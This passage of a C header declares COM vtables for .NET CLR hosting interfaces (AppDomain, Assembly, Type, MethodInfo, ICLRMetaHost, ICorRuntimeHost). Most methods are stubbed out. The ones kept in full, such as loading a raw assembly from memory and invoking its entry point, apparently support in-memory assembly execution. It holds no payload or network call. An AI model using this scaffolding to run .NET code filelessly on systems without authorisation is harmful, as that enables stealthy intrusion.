127 | DUMMY_METHOD(Equals); | |
128 | DUMMY_METHOD(GetHashCode); | |
129 | DUMMY_METHOD(GetType); | |
130 | DUMMY_METHOD(InitializeLifetimeService); | |
131 | DUMMY_METHOD(GetLifetimeService); | |
132 | DUMMY_METHOD(Evidence); | |
133 | DUMMY_METHOD(add_DomainUnload); | |
134 | DUMMY_METHOD(remove_DomainUnload); | |
135 | DUMMY_METHOD(add_AssemblyLoad); | |
136 | DUMMY_METHOD(remove_AssemblyLoad); | |
137 | DUMMY_METHOD(add_ProcessExit); | |
138 | DUMMY_METHOD(remove_ProcessExit); | |
139 | DUMMY_METHOD(add_TypeResolve); | |
140 | DUMMY_METHOD(remove_TypeResolve); | |
141 | DUMMY_METHOD(add_ResourceResolve); | |
142 | DUMMY_METHOD(remove_ResourceResolve); | |
143 | DUMMY_METHOD(add_AssemblyResolve); | |
144 | DUMMY_METHOD(remove_AssemblyResolve); | |
145 | DUMMY_METHOD(add_UnhandledException); | |
146 | DUMMY_METHOD(remove_UnhandledException); | |
147 | DUMMY_METHOD(DefineDynamicAssembly); | |
148 | DUMMY_METHOD(DefineDynamicAssembly_2); | |
149 | DUMMY_METHOD(DefineDynamicAssembly_3); | |
150 | DUMMY_METHOD(DefineDynamicAssembly_4); | |
151 | DUMMY_METHOD(DefineDynamicAssembly_5); | |
152 | DUMMY_METHOD(DefineDynamicAssembly_6); | |
153 | DUMMY_METHOD(DefineDynamicAssembly_7); | |
154 | DUMMY_METHOD(DefineDynamicAssembly_8); | |
155 | DUMMY_METHOD(DefineDynamicAssembly_9); | |
156 | DUMMY_METHOD(CreateInstance); | |
157 | DUMMY_METHOD(CreateInstanceFrom); | |
158 | DUMMY_METHOD(CreateInstance_2); | |
159 | DUMMY_METHOD(CreateInstanceFrom_2); | |
160 | DUMMY_METHOD(CreateInstance_3); | |
161 | DUMMY_METHOD(CreateInstanceFrom_3); | |
162 | DUMMY_METHOD(Load); | |
163 | DUMMY_METHOD(Load_2); | |
164 | ||
165 | HRESULT (STDMETHODCALLTYPE *Load_3)( | |
166 | IAppDomain *This, | |
167 | SAFEARRAY *rawAssembly, | |
168 | IAssembly **pRetVal); | |
169 | ||
170 | DUMMY_METHOD(Load_4); | |
171 | DUMMY_METHOD(Load_5); | |
172 | DUMMY_METHOD(Load_6); | |
173 | DUMMY_METHOD(Load_7); | |
174 | DUMMY_METHOD(ExecuteAssembly); | |
175 | DUMMY_METHOD(ExecuteAssembly_2); | |
176 | DUMMY_METHOD(ExecuteAssembly_3); | |
177 | DUMMY_METHOD(FriendlyName); | |
178 | DUMMY_METHOD(BaseDirectory); | |
179 | DUMMY_METHOD(RelativeSearchPath); | |
180 | DUMMY_METHOD(ShadowCopyFiles); | |
181 | DUMMY_METHOD(GetAssemblies); | |
182 | DUMMY_METHOD(AppendPrivatePath); | |
183 | DUMMY_METHOD(ClearPrivatePath); | |
184 | DUMMY_METHOD(SetShadowCopyPath); | |
185 | DUMMY_METHOD(ClearShadowCopyPath); | |
186 | DUMMY_METHOD(SetCachePath); | |
187 | DUMMY_METHOD(SetData); | |
188 | DUMMY_METHOD(GetData); | |
189 | DUMMY_METHOD(SetAppDomainPolicy); | |
190 | DUMMY_METHOD(SetThreadPrincipal); | |
191 | DUMMY_METHOD(SetPrincipalPolicy); | |
192 | DUMMY_METHOD(DoCallBack); | |
193 | DUMMY_METHOD(DynamicDirectory); | |
194 | ||
195 | END_INTERFACE | |
196 | } AppDomainVtbl; | |
197 | ||
198 | typedef struct _AppDomain { | |
199 | AppDomainVtbl *lpVtbl; | |
200 | } AppDomain; | |
201 | ||
202 | #undef DUMMY_METHOD | |
203 | #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IAssembly *This) | |
204 | ||
205 | typedef struct _AssemblyVtbl { | |
206 | BEGIN_INTERFACE | |
207 | ||
208 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( | |
209 | IAssembly * This, | |
210 | REFIID riid, | |
211 | void **ppvObject); | |
212 | ||
213 | ULONG ( STDMETHODCALLTYPE *AddRef )( | |
214 | IAssembly * This); | |
215 | ||
216 | ULONG ( STDMETHODCALLTYPE *Release )( | |
217 | IAssembly * This); | |
218 | ||
219 | DUMMY_METHOD(GetTypeInfoCount); | |
220 | DUMMY_METHOD(GetTypeInfo); | |
221 | DUMMY_METHOD(GetIDsOfNames); | |
222 | ||
223 | DUMMY_METHOD(Invoke); | |
224 | DUMMY_METHOD(ToString); | |
225 | DUMMY_METHOD(Equals); | |
226 | DUMMY_METHOD(GetHashCode); | |
227 | DUMMY_METHOD(GetType); | |
228 | DUMMY_METHOD(CodeBase); | |
229 | DUMMY_METHOD(EscapedCodeBase); | |
230 | DUMMY_METHOD(GetName); | |
231 | DUMMY_METHOD(GetName_2); | |
232 | DUMMY_METHOD(FullName); | |
233 | ||
234 | HRESULT (STDMETHODCALLTYPE *EntryPoint)( | |
235 | IAssembly *This, | |
236 | IMethodInfo **pRetVal); | |
237 | ||
238 | HRESULT (STDMETHODCALLTYPE *GetType_2)( | |
239 | IAssembly *This, | |
240 | BSTR name, | |
241 | IType **pRetVal); | |
242 | ||
243 | DUMMY_METHOD(GetType_3); | |
244 | DUMMY_METHOD(GetExportedTypes); | |
245 | DUMMY_METHOD(GetTypes); | |
246 | DUMMY_METHOD(GetManifestResourceStream); | |
247 | DUMMY_METHOD(GetManifestResourceStream_2); | |
248 | DUMMY_METHOD(GetFile); | |
249 | DUMMY_METHOD(GetFiles); | |
250 | DUMMY_METHOD(GetFiles_2); | |
251 | DUMMY_METHOD(GetManifestResourceNames); | |
252 | DUMMY_METHOD(GetManifestResourceInfo); | |
253 | DUMMY_METHOD(Location); | |
254 | DUMMY_METHOD(Evidence); | |
255 | DUMMY_METHOD(GetCustomAttributes); | |
256 | DUMMY_METHOD(GetCustomAttributes_2); | |
257 | DUMMY_METHOD(IsDefined); | |
258 | DUMMY_METHOD(GetObjectData); | |
259 | DUMMY_METHOD(add_ModuleResolve); | |
260 | DUMMY_METHOD(remove_ModuleResolve); | |
261 | DUMMY_METHOD(GetType_4); | |
262 | DUMMY_METHOD(GetSatelliteAssembly); | |
263 | DUMMY_METHOD(GetSatelliteAssembly_2); | |
264 | DUMMY_METHOD(LoadModule); | |
265 | DUMMY_METHOD(LoadModule_2); | |
266 | DUMMY_METHOD(CreateInstance); | |
267 | DUMMY_METHOD(CreateInstance_2); | |
268 | DUMMY_METHOD(CreateInstance_3); | |
269 | DUMMY_METHOD(GetLoadedModules); | |
270 | DUMMY_METHOD(GetLoadedModules_2); | |
271 | DUMMY_METHOD(GetModules); | |
272 | DUMMY_METHOD(GetModules_2); | |
273 | DUMMY_METHOD(GetModule); | |
274 | DUMMY_METHOD(GetReferencedAssemblies); | |
275 | DUMMY_METHOD(GlobalAssemblyCache); | |
276 | ||
277 | END_INTERFACE | |
278 | } AssemblyVtbl; | |
279 | ||
280 | typedef enum _BindingFlags { | |
281 | BindingFlags_Default = 0, | |
282 | BindingFlags_IgnoreCase = 1, | |
283 | BindingFlags_DeclaredOnly = 2, | |
284 | BindingFlags_Instance = 4, | |
285 | BindingFlags_Static = 8, | |
286 | BindingFlags_Public = 16, | |
287 | BindingFlags_NonPublic = 32, | |
288 | BindingFlags_FlattenHierarchy = 64, | |
289 | BindingFlags_InvokeMethod = 256, | |
290 | BindingFlags_CreateInstance = 512, | |
291 | BindingFlags_GetField = 1024, | |
292 | BindingFlags_SetField = 2048, | |
293 | BindingFlags_GetProperty = 4096, | |
294 | BindingFlags_SetProperty = 8192, | |
295 | BindingFlags_PutDispProperty = 16384, | |
296 | BindingFlags_PutRefDispProperty = 32768, | |
297 | BindingFlags_ExactBinding = 65536, | |
298 | BindingFlags_SuppressChangeType = 131072, | |
299 | BindingFlags_OptionalParamBinding = 262144, | |
300 | BindingFlags_IgnoreReturn = 16777216 | |
301 | } BindingFlags; | |
302 | ||
303 | typedef struct _Assembly { | |
304 | AssemblyVtbl *lpVtbl; | |
305 | } Assembly; | |
306 | ||
307 | #undef DUMMY_METHOD | |
308 | #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IType *This) | |
309 | ||
310 | typedef struct _TypeVtbl { | |
311 | BEGIN_INTERFACE | |
312 | ||
313 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( | |
314 | IType * This, | |
315 | REFIID riid, | |
316 | void **ppvObject); | |
317 | ||
318 | ULONG ( STDMETHODCALLTYPE *AddRef )( | |
319 | IType * This); | |
320 | ||
321 | ULONG ( STDMETHODCALLTYPE *Release )( | |
322 | IType * This); | |
323 | ||
324 | DUMMY_METHOD(GetTypeInfoCount); | |
325 | DUMMY_METHOD(GetTypeInfo); | |
326 | DUMMY_METHOD(GetIDsOfNames); | |
327 | DUMMY_METHOD(Invoke); | |
328 | ||
329 | DUMMY_METHOD(ToString); | |
330 | DUMMY_METHOD(Equals); | |
331 | DUMMY_METHOD(GetHashCode); | |
332 | DUMMY_METHOD(GetType); | |
333 | DUMMY_METHOD(MemberType); | |
334 | DUMMY_METHOD(name); | |
335 | DUMMY_METHOD(DeclaringType); | |
336 | DUMMY_METHOD(ReflectedType); | |
337 | DUMMY_METHOD(GetCustomAttributes); | |
338 | DUMMY_METHOD(GetCustomAttributes_2); | |
339 | DUMMY_METHOD(IsDefined); | |
340 | DUMMY_METHOD(Guid); | |
341 | DUMMY_METHOD(Module); | |
342 | DUMMY_METHOD(Assembly); | |
343 | DUMMY_METHOD(TypeHandle); | |
344 | DUMMY_METHOD(FullName); | |
345 | DUMMY_METHOD(Namespace); | |
346 | DUMMY_METHOD(AssemblyQualifiedName); | |
347 | DUMMY_METHOD(GetArrayRank); | |
348 | DUMMY_METHOD(BaseType); | |
349 | DUMMY_METHOD(GetConstructors); | |
350 | DUMMY_METHOD(GetInterface); | |
351 | DUMMY_METHOD(GetInterfaces); | |
352 | DUMMY_METHOD(FindInterfaces); | |
353 | DUMMY_METHOD(GetEvent); | |
354 | DUMMY_METHOD(GetEvents); | |
355 | DUMMY_METHOD(GetEvents_2); | |
356 | DUMMY_METHOD(GetNestedTypes); | |
357 | DUMMY_METHOD(GetNestedType); | |
358 | DUMMY_METHOD(GetMember); | |
359 | DUMMY_METHOD(GetDefaultMembers); | |
360 | DUMMY_METHOD(FindMembers); | |
361 | DUMMY_METHOD(GetElementType); | |
362 | DUMMY_METHOD(IsSubclassOf); | |
363 | DUMMY_METHOD(IsInstanceOfType); | |
364 | DUMMY_METHOD(IsAssignableFrom); | |
365 | DUMMY_METHOD(GetInterfaceMap); | |
366 | DUMMY_METHOD(GetMethod); | |
367 | DUMMY_METHOD(GetMethod_2); | |
368 | DUMMY_METHOD(GetMethods); | |
369 | DUMMY_METHOD(GetField); | |
370 | DUMMY_METHOD(GetFields); | |
371 | DUMMY_METHOD(GetProperty); | |
372 | DUMMY_METHOD(GetProperty_2); | |
373 | DUMMY_METHOD(GetProperties); | |
374 | DUMMY_METHOD(GetMember_2); | |
375 | DUMMY_METHOD(GetMembers); | |
376 | DUMMY_METHOD(InvokeMember); | |
377 | DUMMY_METHOD(UnderlyingSystemType); | |
378 | DUMMY_METHOD(InvokeMember_2); | |
379 | ||
380 | HRESULT (STDMETHODCALLTYPE *InvokeMember_3)( | |
381 | IType *This, | |
382 | BSTR name, | |
383 | BindingFlags invokeAttr, | |
384 | IBinder *Binder, | |
385 | VARIANT Target, | |
386 | SAFEARRAY *args, | |
387 | VARIANT *pRetVal); | |
388 | ||
389 | DUMMY_METHOD(GetConstructor); | |
390 | DUMMY_METHOD(GetConstructor_2); | |
391 | DUMMY_METHOD(GetConstructor_3); | |
392 | DUMMY_METHOD(GetConstructors_2); | |
393 | DUMMY_METHOD(TypeInitializer); | |
394 | DUMMY_METHOD(GetMethod_3); | |
395 | DUMMY_METHOD(GetMethod_4); | |
396 | DUMMY_METHOD(GetMethod_5); | |
397 | DUMMY_METHOD(GetMethod_6); | |
398 | DUMMY_METHOD(GetMethods_2); | |
399 | DUMMY_METHOD(GetField_2); | |
400 | DUMMY_METHOD(GetFields_2); | |
401 | DUMMY_METHOD(GetInterface_2); | |
402 | DUMMY_METHOD(GetEvent_2); | |
403 | DUMMY_METHOD(GetProperty_3); | |
404 | DUMMY_METHOD(GetProperty_4); | |
405 | DUMMY_METHOD(GetProperty_5); | |
406 | DUMMY_METHOD(GetProperty_6); | |
407 | DUMMY_METHOD(GetProperty_7); | |
408 | DUMMY_METHOD(GetProperties_2); | |
409 | DUMMY_METHOD(GetNestedTypes_2); | |
410 | DUMMY_METHOD(GetNestedType_2); | |
411 | DUMMY_METHOD(GetMember_3); | |
412 | DUMMY_METHOD(GetMembers_2); | |
413 | DUMMY_METHOD(Attributes); | |
414 | DUMMY_METHOD(IsNotPublic); | |
415 | DUMMY_METHOD(IsPublic); | |
416 | DUMMY_METHOD(IsNestedPublic); | |
417 | DUMMY_METHOD(IsNestedPrivate); | |
418 | DUMMY_METHOD(IsNestedFamily); | |
419 | DUMMY_METHOD(IsNestedAssembly); | |
420 | DUMMY_METHOD(IsNestedFamANDAssem); | |
421 | DUMMY_METHOD(IsNestedFamORAssem); | |
422 | DUMMY_METHOD(IsAutoLayout); | |
423 | DUMMY_METHOD(IsLayoutSequential); | |
424 | DUMMY_METHOD(IsExplicitLayout); | |
425 | DUMMY_METHOD(IsClass); | |
426 | DUMMY_METHOD(IsInterface); | |
427 | DUMMY_METHOD(IsValueType); | |
428 | DUMMY_METHOD(IsAbstract); | |
429 | DUMMY_METHOD(IsSealed); | |
430 | DUMMY_METHOD(IsEnum); | |
431 | DUMMY_METHOD(IsSpecialName); | |
432 | DUMMY_METHOD(IsImport); | |
433 | DUMMY_METHOD(IsSerializable); | |
434 | DUMMY_METHOD(IsAnsiClass); | |
435 | DUMMY_METHOD(IsUnicodeClass); | |
436 | DUMMY_METHOD(IsAutoClass); | |
437 | DUMMY_METHOD(IsArray); | |
438 | DUMMY_METHOD(IsByRef); | |
439 | DUMMY_METHOD(IsPointer); | |
440 | DUMMY_METHOD(IsPrimitive); | |
441 | DUMMY_METHOD(IsCOMObject); | |
442 | DUMMY_METHOD(HasElementType); | |
443 | DUMMY_METHOD(IsContextful); | |
444 | DUMMY_METHOD(IsMarshalByRef); | |
445 | DUMMY_METHOD(Equals_2); | |
446 | ||
447 | END_INTERFACE | |
448 | } TypeVtbl; | |
449 | ||
450 | typedef struct ICLRRuntimeInfoVtbl | |
451 | { | |
452 | BEGIN_INTERFACE | |
453 | ||
454 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( | |
455 | ICLRRuntimeInfo * This, | |
456 | /* [in] */ REFIID riid, | |
457 | /* [iid_is][out] */ | |
458 | __RPC__deref_out void **ppvObject); | |
459 | ||
460 | ULONG ( STDMETHODCALLTYPE *AddRef )( | |
461 | ICLRRuntimeInfo * This); | |
462 | ||
463 | ULONG ( STDMETHODCALLTYPE *Release )( | |
464 | ICLRRuntimeInfo * This); | |
465 | ||
466 | HRESULT ( STDMETHODCALLTYPE *GetVersionString )( | |
467 | ICLRRuntimeInfo * This, | |
468 | /* [size_is][out] */ | |
469 | __out_ecount_full_opt(*pcchBuffer) LPWSTR pwzBuffer, | |
470 | /* [out][in] */ DWORD *pcchBuffer); | |
471 | ||
472 | HRESULT ( STDMETHODCALLTYPE *GetRuntimeDirectory )( | |
473 | ICLRRuntimeInfo * This, | |
474 | /* [size_is][out] */ | |
475 | __out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer, | |
476 | /* [out][in] */ DWORD *pcchBuffer); | |
477 | ||
478 | HRESULT ( STDMETHODCALLTYPE *IsLoaded )( | |
479 | ICLRRuntimeInfo * This, | |
480 | /* [in] */ HANDLE hndProcess, | |
481 | /* [retval][out] */ BOOL *pbLoaded); | |
482 | ||
483 | HRESULT ( STDMETHODCALLTYPE *LoadErrorString )( | |
484 | ICLRRuntimeInfo * This, | |
485 | /* [in] */ UINT iResourceID, | |
486 | /* [size_is][out] */ | |
487 | __out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer, | |
488 | /* [out][in] */ DWORD *pcchBuffer, | |
489 | /* [lcid][in] */ LONG iLocaleID); | |
490 | ||
491 | HRESULT ( STDMETHODCALLTYPE *LoadLibrary )( | |
492 | ICLRRuntimeInfo * This, | |
493 | /* [in] */ LPCWSTR pwzDllName, | |
494 | /* [retval][out] */ HMODULE *phndModule); | |
495 | ||
496 | HRESULT ( STDMETHODCALLTYPE *GetProcAddress )( | |
497 | ICLRRuntimeInfo * This, | |
498 | /* [in] */ LPCSTR pszProcName, | |
499 | /* [retval][out] */ LPVOID *ppProc); | |
500 | ||
501 | HRESULT ( STDMETHODCALLTYPE *GetInterface )( | |
502 | ICLRRuntimeInfo * This, | |
503 | /* [in] */ REFCLSID rclsid, | |
504 | /* [in] */ REFIID riid, | |
505 | /* [retval][iid_is][out] */ LPVOID *ppUnk); | |
506 | ||
507 | HRESULT ( STDMETHODCALLTYPE *IsLoadable )( | |
508 | ICLRRuntimeInfo * This, | |
509 | /* [retval][out] */ BOOL *pbLoadable); | |
510 | ||
511 | HRESULT ( STDMETHODCALLTYPE *SetDefaultStartupFlags )( | |
512 | ICLRRuntimeInfo * This, | |
513 | /* [in] */ DWORD dwStartupFlags, | |
514 | /* [in] */ LPCWSTR pwzHostConfigFile); | |
515 | ||
516 | HRESULT ( STDMETHODCALLTYPE *GetDefaultStartupFlags )( | |
517 | ICLRRuntimeInfo * This, | |
518 | /* [out] */ DWORD *pdwStartupFlags, | |
519 | /* [size_is][out] */ | |
520 | __out_ecount_full_opt(*pcchHostConfigFile) LPWSTR pwzHostConfigFile, | |
521 | /* [out][in] */ DWORD *pcchHostConfigFile); | |
522 | ||
523 | HRESULT ( STDMETHODCALLTYPE *BindAsLegacyV2Runtime )( | |
524 | ICLRRuntimeInfo * This); | |
525 | ||
526 | HRESULT ( STDMETHODCALLTYPE *IsStarted )( | |
527 | ICLRRuntimeInfo * This, | |
528 | /* [out] */ BOOL *pbStarted, | |
529 | /* [out] */ DWORD *pdwStartupFlags); | |
530 | ||
531 | END_INTERFACE | |
532 | } ICLRRuntimeInfoVtbl; | |
533 | ||
534 | typedef struct _ICLRRuntimeInfo { | |
535 | ICLRRuntimeInfoVtbl *lpVtbl; | |
536 | } ICLRRuntimeInfo; | |
537 | ||
538 | typedef struct _Type { | |
539 | TypeVtbl *lpVtbl; | |
540 | } Type; | |
541 | ||
542 | typedef struct ICLRMetaHostVtbl | |
543 | { | |
544 | BEGIN_INTERFACE | |
545 | ||
546 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( | |
547 | ICLRMetaHost * This, | |
548 | /* [in] */ REFIID riid, | |
549 | /* [iid_is][out] */ | |
550 | __RPC__deref_out void **ppvObject); | |
551 | ||
552 | ULONG ( STDMETHODCALLTYPE *AddRef )( | |
553 | ICLRMetaHost * This); | |
554 | ||
555 | ULONG ( STDMETHODCALLTYPE *Release )( | |
556 | ICLRMetaHost * This); | |
557 | ||
558 | HRESULT ( STDMETHODCALLTYPE *GetRuntime )( | |
559 | ICLRMetaHost * This, | |
560 | /* [in] */ LPCWSTR pwzVersion, | |
561 | /* [in] */ REFIID riid, | |
562 | /* [retval][iid_is][out] */ LPVOID *ppRuntime); | |
563 | ||
564 | HRESULT ( STDMETHODCALLTYPE *GetVersionFromFile )( | |
565 | ICLRMetaHost * This, | |
566 | /* [in] */ LPCWSTR pwzFilePath, | |
567 | /* [size_is][out] */ | |
568 | __out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer, | |
569 | /* [out][in] */ DWORD *pcchBuffer); | |
570 | ||
571 | HRESULT ( STDMETHODCALLTYPE *EnumerateInstalledRuntimes )( | |
572 | ICLRMetaHost * This, | |
573 | /* [retval][out] */ IEnumUnknown **ppEnumerator); | |
574 | ||
575 | HRESULT ( STDMETHODCALLTYPE *EnumerateLoadedRuntimes )( | |
576 | ICLRMetaHost * This, | |
577 | /* [in] */ HANDLE hndProcess, | |
578 | /* [retval][out] */ IEnumUnknown **ppEnumerator); | |
579 | ||
580 | HRESULT ( STDMETHODCALLTYPE *RequestRuntimeLoadedNotification )( | |
581 | ICLRMetaHost * This, | |
582 | /* [in] */ RuntimeLoadedCallbackFnPtr pCallbackFunction); | |
583 | ||
584 | HRESULT ( STDMETHODCALLTYPE *QueryLegacyV2RuntimeBinding )( | |
585 | ICLRMetaHost * This, | |
586 | /* [in] */ REFIID riid, | |
587 | /* [retval][iid_is][out] */ LPVOID *ppUnk); | |
588 | ||
589 | HRESULT ( STDMETHODCALLTYPE *ExitProcess )( | |
590 | ICLRMetaHost * This, | |
591 | /* [in] */ INT32 iExitCode); | |
592 | ||
593 | END_INTERFACE | |
594 | } ICLRMetaHostVtbl; | |
595 | ||
596 | typedef struct _ICLRMetaHost | |
597 | { | |
598 | ICLRMetaHostVtbl *lpVtbl; | |
599 | } ICLRMetaHost; | |
600 | ||
601 | typedef struct ICorRuntimeHostVtbl | |
602 | { | |
603 | BEGIN_INTERFACE | |
604 | ||
605 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( | |
606 | ICorRuntimeHost * This, | |
607 | /* [in] */ REFIID riid, | |
608 | /* [iid_is][out] */ | |
609 | __RPC__deref_out void **ppvObject); | |
610 | ||
611 | ULONG ( STDMETHODCALLTYPE *AddRef )( | |
612 | ICorRuntimeHost * This); | |
613 | ||
614 | ULONG ( STDMETHODCALLTYPE *Release )( | |
615 | ICorRuntimeHost * This); | |
616 | ||
617 | HRESULT ( STDMETHODCALLTYPE *CreateLogicalThreadState )( | |
618 | ICorRuntimeHost * This); | |
619 | ||
620 | HRESULT ( STDMETHODCALLTYPE *DeleteLogicalThreadState )( | |
621 | ICorRuntimeHost * This); | |
622 | ||
623 | HRESULT ( STDMETHODCALLTYPE *SwitchInLogicalThreadState )( | |
624 | ICorRuntimeHost * This, | |
625 | /* [in] */ DWORD *pFiberCookie); | |
626 | ||
627 | HRESULT ( STDMETHODCALLTYPE *SwitchOutLogicalThreadState )( | |
628 | ICorRuntimeHost * This, | |
629 | /* [out] */ DWORD **pFiberCookie); | |
630 | ||
631 | HRESULT ( STDMETHODCALLTYPE *LocksHeldByLogicalThread )( | |
632 | ICorRuntimeHost * This, | |
633 | /* [out] */ DWORD *pCount); | |
634 | ||
635 | HRESULT ( STDMETHODCALLTYPE *MapFile )( | |
636 | ICorRuntimeHost * This, | |
637 | /* [in] */ HANDLE hFile, | |
638 | /* [out] */ HMODULE *hMapAddress); | |
639 | ||
640 | HRESULT ( STDMETHODCALLTYPE *GetConfiguration )( | |
641 | ICorRuntimeHost * This, | |
642 | /* [out] */ ICorConfiguration **pConfiguration); | |
643 | ||
644 | HRESULT ( STDMETHODCALLTYPE *Start )( | |
645 | ICorRuntimeHost * This); | |
646 | ||
647 | HRESULT ( STDMETHODCALLTYPE *Stop )( | |
648 | ICorRuntimeHost * This); | |
649 | ||
650 | HRESULT ( STDMETHODCALLTYPE *CreateDomain )( | |
651 | ICorRuntimeHost * This, | |
652 | /* [in] */ LPCWSTR pwzFriendlyName, | |
653 | /* [in] */ IUnknown *pIdentityArray, | |
654 | /* [out] */ IUnknown **pAppDomain); | |
655 | ||
656 | HRESULT ( STDMETHODCALLTYPE *GetDefaultDomain )( | |
657 | ICorRuntimeHost * This, | |
658 | /* [out] */ IUnknown **pAppDomain); | |
659 | ||
660 | HRESULT ( STDMETHODCALLTYPE *EnumDomains )( | |
661 | ICorRuntimeHost * This, | |
662 | /* [out] */ HDOMAINENUM *hEnum); | |
663 | ||
664 | HRESULT ( STDMETHODCALLTYPE *NextDomain )( | |
665 | ICorRuntimeHost * This, | |
666 | /* [in] */ HDOMAINENUM hEnum, | |
667 | /* [out] */ IUnknown **pAppDomain); | |
668 | ||
669 | HRESULT ( STDMETHODCALLTYPE *CloseEnum )( | |
670 | ICorRuntimeHost * This, | |
671 | /* [in] */ HDOMAINENUM hEnum); | |
672 | ||
673 | HRESULT ( STDMETHODCALLTYPE *CreateDomainEx )( | |
674 | ICorRuntimeHost * This, | |
675 | /* [in] */ LPCWSTR pwzFriendlyName, | |
676 | /* [in] */ IUnknown *pSetup, | |
677 | /* [in] */ IUnknown *pEvidence, | |
678 | /* [out] */ IUnknown **pAppDomain); | |
679 | ||
680 | HRESULT ( STDMETHODCALLTYPE *CreateDomainSetup )( | |
681 | ICorRuntimeHost * This, | |
682 | /* [out] */ IUnknown **pAppDomainSetup); | |
683 | ||
684 | HRESULT ( STDMETHODCALLTYPE *CreateEvidence )( | |
685 | ICorRuntimeHost * This, | |
686 | /* [out] */ IUnknown **pEvidence); | |
687 | ||
688 | HRESULT ( STDMETHODCALLTYPE *UnloadDomain )( | |
689 | ICorRuntimeHost * This, | |
690 | /* [in] */ IUnknown *pAppDomain); | |
691 | ||
692 | HRESULT ( STDMETHODCALLTYPE *CurrentDomain )( | |
693 | ICorRuntimeHost * This, | |
694 | /* [out] */ IUnknown **pAppDomain); | |
695 | ||
696 | END_INTERFACE | |
697 | } ICorRuntimeHostVtbl; | |
698 | ||
699 | typedef struct _ICorRuntimeHost { | |
700 | ICorRuntimeHostVtbl *lpVtbl; | |
701 | } ICorRuntimeHost; | |
702 | ||
703 | #undef DUMMY_METHOD | |
704 | #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IMethodInfo *This) | |
705 | ||
706 | typedef struct _MethodInfoVtbl { | |
707 | BEGIN_INTERFACE | |
708 | ||
709 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( | |
710 | IMethodInfo *This, | |
711 | /* [in] */ REFIID riid, | |
712 | /* [iid_is][out] */ | |
713 | __RPC__deref_out void **ppvObject); | |
714 | ||
715 | ULONG ( STDMETHODCALLTYPE *AddRef )( | |
716 | IMethodInfo *This); | |
717 | ||
718 | ULONG ( STDMETHODCALLTYPE *Release )( | |
719 | IMethodInfo *This); | |
720 | ||
721 | DUMMY_METHOD(GetTypeInfoCount); | |
722 | DUMMY_METHOD(GetTypeInfo); | |
723 | DUMMY_METHOD(GetIDsOfNames); | |
724 | DUMMY_METHOD(Invoke); | |
725 | ||
726 | DUMMY_METHOD(ToString); | |
727 | DUMMY_METHOD(Equals); | |
728 | DUMMY_METHOD(GetHashCode); | |
729 | DUMMY_METHOD(GetType); | |
730 | DUMMY_METHOD(MemberType); | |
731 | DUMMY_METHOD(name); | |
732 | DUMMY_METHOD(DeclaringType); | |
733 | DUMMY_METHOD(ReflectedType); | |
734 | DUMMY_METHOD(GetCustomAttributes); | |
735 | DUMMY_METHOD(GetCustomAttributes_2); | |
736 | DUMMY_METHOD(IsDefined); | |
737 | ||
738 | HRESULT ( STDMETHODCALLTYPE *GetParameters)( | |
739 | IMethodInfo *This, | |
740 | SAFEARRAY **pRetVal); | |
741 | ||
742 | DUMMY_METHOD(GetMethodImplementationFlags); | |
743 | DUMMY_METHOD(MethodHandle); | |
744 | DUMMY_METHOD(Attributes); | |
745 | DUMMY_METHOD(CallingConvention); | |
746 | DUMMY_METHOD(Invoke_2); | |
747 | DUMMY_METHOD(IsPublic); | |
748 | DUMMY_METHOD(IsPrivate); | |
749 | DUMMY_METHOD(IsFamily); | |
750 | DUMMY_METHOD(IsAssembly); | |
751 | DUMMY_METHOD(IsFamilyAndAssembly); | |
752 | DUMMY_METHOD(IsFamilyOrAssembly); | |
753 | DUMMY_METHOD(IsStatic); | |
754 | DUMMY_METHOD(IsFinal); | |
755 | DUMMY_METHOD(IsVirtual); | |
756 | DUMMY_METHOD(IsHideBySig); | |
757 | DUMMY_METHOD(IsAbstract); | |
758 | DUMMY_METHOD(IsSpecialName); | |
759 | DUMMY_METHOD(IsConstructor); | |
760 | ||
761 | HRESULT ( STDMETHODCALLTYPE *Invoke_3 )( | |
762 | IMethodInfo *This, | |
763 | VARIANT obj, | |
764 | SAFEARRAY *parameters, | |
765 | VARIANT *ret); | |
766 | ||
767 | DUMMY_METHOD(returnType); | |
768 | DUMMY_METHOD(ReturnTypeCustomAttributes); | |
769 | DUMMY_METHOD(GetBaseDefinition); | |
770 | ||
771 | END_INTERFACE | |
772 | } MethodInfoVtbl; | |
773 | ||
774 | typedef struct _MethodInfo { | |
775 | MethodInfoVtbl *lpVtbl; | |
776 | } MethodInfo; | |
777 | ||
778 | typedef struct ICorConfigurationVtbl | |
779 | { | |
780 | BEGIN_INTERFACE | |
781 | ||
782 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( | |
783 | ICorConfiguration * This, | |
784 | /* [in] */ REFIID riid, | |
785 | /* [iid_is][out] */ | |
786 | __RPC__deref_out void **ppvObject); | |
787 | ||
788 | ULONG ( STDMETHODCALLTYPE *AddRef )( | |
789 | ICorConfiguration * This); | |
790 | ||
791 | ULONG ( STDMETHODCALLTYPE *Release )( | |
792 | ICorConfiguration * This); | |
793 | ||
794 | HRESULT ( STDMETHODCALLTYPE *SetGCThreadControl )( | |
795 | ICorConfiguration * This, | |
796 | /* [in] */ IGCThreadControl *pGCThreadControl); | |
797 | ||
798 | HRESULT ( STDMETHODCALLTYPE *SetGCHostControl )( | |
799 | ICorConfiguration * This, | |
800 | /* [in] */ IGCHostControl *pGCHostControl); | |
801 | ||
802 | HRESULT ( STDMETHODCALLTYPE *SetDebuggerThreadControl )( | |
803 | ICorConfiguration * This, | |
804 | /* [in] */ IDebuggerThreadControl *pDebuggerThreadControl); | |
805 | ||
806 | HRESULT ( STDMETHODCALLTYPE *AddDebuggerSpecialThread )( | |
807 | ICorConfiguration * This, | |
808 | /* [in] */ DWORD dwSpecialThreadId); | |
809 | ||
810 | END_INTERFACE | |
811 | } ICorConfigurationVtbl; | |
812 | ||
813 | typedef struct _ICorConfiguration | |
814 | { | |
